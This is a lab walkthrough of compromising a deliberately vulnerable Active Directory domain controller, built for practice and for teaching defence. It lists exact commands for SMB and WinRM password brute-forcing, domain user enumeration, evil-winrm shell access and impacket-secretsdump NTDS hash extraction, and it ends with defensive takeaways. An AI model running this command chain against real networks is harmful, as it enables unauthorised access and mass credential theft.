Building and Breaking a Vulnerable Active Directory Lab: Full Exploitation Walkthrough

Introduction

Active Directory attacks are best learned hands-on. Theory explains what AD is, but exploitation teaches why it fails. This post documents a full attack lifecycle against a deliberately vulnerable Active Directory environment — including exact commands, decision points, and why each step works.

The vulnerable lab server can be created using the public script available here:

Hacklab-AD

What follows is not a checklist. It is an attack narrative, grounded in real tooling and real outcomes.

Lab Setup Overview

The lab consists of:

• A Windows Server acting as a Domain Controller
• Domain: lab.local
• Multiple intentionally weak user and service accounts
• Misconfigured privileges and legacy hygiene issues

Once the setup script from the repository is executed, the environment is ready for exploitation.

Step 1: Network Reconnaissance

The first goal is to confirm whether the target is an Active Directory Domain Controller.

1

nmap -sC -sV -p- 192.168.198.10

Key indicators from the output:

• Kerberos on port 88
• LDAP on 389 / 636
• SMB on 445
• WinRM on 5985
• Hostname DC01
• Domain name exposed via LDAP: lab.local

At this point, we already know: This is a Domain Controller, and credentials will be the fastest path forward.

Step 2: SMB Password Brute Force (Initial Foothold)

Instead of spraying blindly, we target SMB with a curated username list.

1
2
3
4

nxc smb 192.168.198.10 \
  -u /usr/share/wordlists/seclists/Usernames/cirt-default-usernames.txt \
  -p /usr/share/wordlists/rockyou.txt \
  --ignore-pw-decoding

Successful authentication:

1

lab.local\WebAdmin:princess

This single credential unlocks enumeration across the domain.

Step 3: Enumerating Domain Users

Using the valid SMB credentials:

1

nxc smb 192.168.198.10 -u WebAdmin -p princess --users

This returns the full domain user list, including:

• Regular users
• Service accounts
• Backup and operator accounts
• Accounts with known weak passwords
• Accounts flagged as AS-REP roastable or delegation-enabled

This step is critical. From here on, attacks become targeted, not probabilistic.

Step 4: Full Credential Compromise (Targeted Brute Force)

Extract usernames and brute-force them systematically:

1
2
3
4
5
6
7

awk '{print $5}' users.txt > all_users.txt

nxc smb 192.168.198.10 \
  -u all_users.txt \
  -p /usr/share/wordlists/rockyou.txt \
  --continue-on-success \
  --ignore-pw-decoding

Multiple valid credentials are discovered:

1
2
3
4
5

jane.smith:password
chris:000000
scanner:welcome
mysql:letmein
subspace:trustno1

At this point, password reuse and weak policy have collapsed identity security.

Step 5: Web Enumeration (Credential Leakage)

Web services often leak supporting data.

1
2
3
4

gobuster dir \
  -u http://192.168.198.10 \
  -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt \
  -x txt,zip,bak

Interesting findings:

1
2

/users.txt
/passwords.txt

This reinforces a common lesson: web misconfigurations amplify identity compromise.

Step 6: Testing WinRM Access

Not all credentials work everywhere. We now test WinRM explicitly.

1
2
3
4

nxc winrm 192.168.198.10 \
  -u users.txt \
  -p passwords.txt \
  --no-bruteforce

Successful login:

1

lab.local\www:shadow (Pwn3d!)

WinRM access to a Domain Controller is a serious escalation.

Step 7: Interactive Shell on the Domain Controller

1

evil-winrm -u www -p shadow -i 192.168.198.10

Verify context:

1

whoami

1

lab\www

Enumerate groups:

1

net group "Domain Admins"

Result:

1
2

admin.backup
Administrator

Now we know which account actually controls the domain.

Step 8: Domain Admin Credential Discovery

Brute-force the backup admin account:

1
2
3
4

nxc winrm 192.168.198.10 \
  -u admin.backup \
  -p /usr/share/wordlists/rockyou.txt \
  --ignore-pw-decoding

Success:

1

lab.local\admin.backup:admin (Pwn3d!)

At this point, the domain is functionally lost.

Step 9: Dumping the Domain (NTDS)

With Domain Admin privileges:

1

impacket-secretsdump lab.local/admin.backup:admin@192.168.198.10 -use-vss

This extracts:

• All domain password hashes
• Kerberos keys
• Service account secrets
• Machine account credentials

From here:

• Pass-the-hash is trivial
• Golden tickets are possible
• Long-term persistence is guaranteed

This is the point of no return.

Why This Attack Works

Nothing here is exotic.

• Weak passwords
• Excessive privileges
• Poor credential monitoring
• Service account neglect
• Domain Controller exposure

Active Directory did exactly what it was configured to do.

Defensive Takeaways

• Enforce strong, unique passwords
• Monitor authentication failures centrally
• Tier administrative access
• Audit backup and service accounts
• Treat WinRM on DCs as critical exposure
• Assume breach — design for containment

Conclusion

This lab demonstrates a brutal truth: Active Directory rarely falls to exploits. It falls to habits.

The most dangerous attacker is not the one with zero-days, but the one who understands how organizations actually operate their identity infrastructure.

If you can build this lab, you can break it. If you can break it, you can defend it.